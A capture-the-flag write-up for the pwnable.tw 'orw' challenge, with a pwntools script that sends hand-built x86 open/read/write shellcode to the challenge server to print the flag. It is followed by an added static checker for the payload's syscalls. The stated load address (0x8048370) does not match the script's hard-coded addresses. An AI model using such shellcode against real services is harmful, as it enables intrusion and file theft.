Challenge


Solving

Running the binary:

And part of the main disassembly:

The binary reads our payload, stores it at the address 0x8048370, and then runs the code there.

As the problem description says, we should probably build shellcode that uses only the open, read and write syscalls.

Here is my Python script:

#!/usr/bin/env python
# pwnable.tw orw

from pwn import *

debug = 0

def exploit():
    # asm() returns bytes, so the payload is built as a bytes object
    shellcode = b''
    shellcode += asm('mov eax, 0x5')        # syscall : open
    shellcode += asm('mov ebx, 0x804a09c')  # filename (path string appended below)
    shellcode += asm('mov ecx, 0x0')        # flags
    shellcode += asm('mov edx, 0x804a0ab')  # mode (address of the 'r' string below)
    shellcode += asm('int 0x80')
    shellcode += asm('mov ebx, eax')        # fd returned by open
    shellcode += asm('mov eax, 0x3')        # syscall : read
    shellcode += asm('mov ecx, 0x804a100')  # buf
    shellcode += asm('mov edx, 0x64')       # count
    shellcode += asm('int 0x80')
    shellcode += asm('mov edx, eax')        # count = bytes returned by read
    shellcode += asm('mov eax, 0x4')        # syscall : write
    shellcode += asm('mov ebx, 0x1')        # fd (stdout)
    shellcode += asm('mov ecx, 0x804a100')  # buf
    shellcode += asm('int 0x80')
    shellcode += b'/home/orw/flag\x00'
    shellcode += b'r\x00'
    s.send(shellcode)

if __name__ == '__main__':
    if debug:
        s = process('./orw')
        pause()
    else:
        s = remote('chall.pwnable.tw', 10001)

    exploit()
    s.interactive()
    s.close()
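
To check a payload like this against the open/read/write restriction from the problem description, the following added example (not part of the original post) statically lists the syscall number in eax at each int 0x80. The names trace_syscalls, violations and SAMPLE are hypothetical, the sample bytes are hand-assembled from the script above, and the decoder assumes only the three instruction forms that script uses.

```python
import struct

# i386 int 0x80 syscall numbers the script on this page uses
ALLOWED = {3: "read", 4: "write", 5: "open"}
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Constructed sample: the script's 15 instructions hand-assembled,
# followed by its two trailing strings.
SAMPLE = bytes.fromhex(
    "b805000000bb9ca00408b900000000baaba00408cd80"
    "89c3b803000000b900a10408ba64000000cd80"
    "89c2b804000000bb01000000b900a10408cd80"
) + b"/home/orw/flag\x00r\x00"


def trace_syscalls(code):
    """Decode linearly; return ([(nr, name-or-None), ...], bytes decoded)."""
    regs = dict.fromkeys(REGS)          # None means "not known statically"
    calls, i = [], 0
    while i < len(code):
        op = code[i]
        if 0xB8 <= op <= 0xBF and i + 5 <= len(code):    # mov r32, imm32
            regs[REGS[op - 0xB8]] = struct.unpack_from("<I", code, i + 1)[0]
            i += 5
        elif op == 0x89 and i + 1 < len(code) and code[i + 1] >> 6 == 3:
            modrm = code[i + 1]                          # mov r32, r32
            regs[REGS[modrm & 7]] = regs[REGS[(modrm >> 3) & 7]]
            i += 2
        elif code[i:i + 2] == b"\xcd\x80":               # int 0x80
            calls.append((regs["eax"], ALLOWED.get(regs["eax"])))
            regs["eax"] = None                           # return value unknown
            i += 2
        else:
            break      # data, or an instruction outside this small subset
    return calls, i


def violations(code):
    """Syscall numbers outside the allowlist (None = eax not resolvable)."""
    return [nr for nr, name in trace_syscalls(code)[0] if name is None]


if __name__ == "__main__":
    print(trace_syscalls(SAMPLE), violations(SAMPLE))
```

Decoding stops at the first byte outside the subset, which for the sample is the start of the appended path string at offset 60.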


FL4G
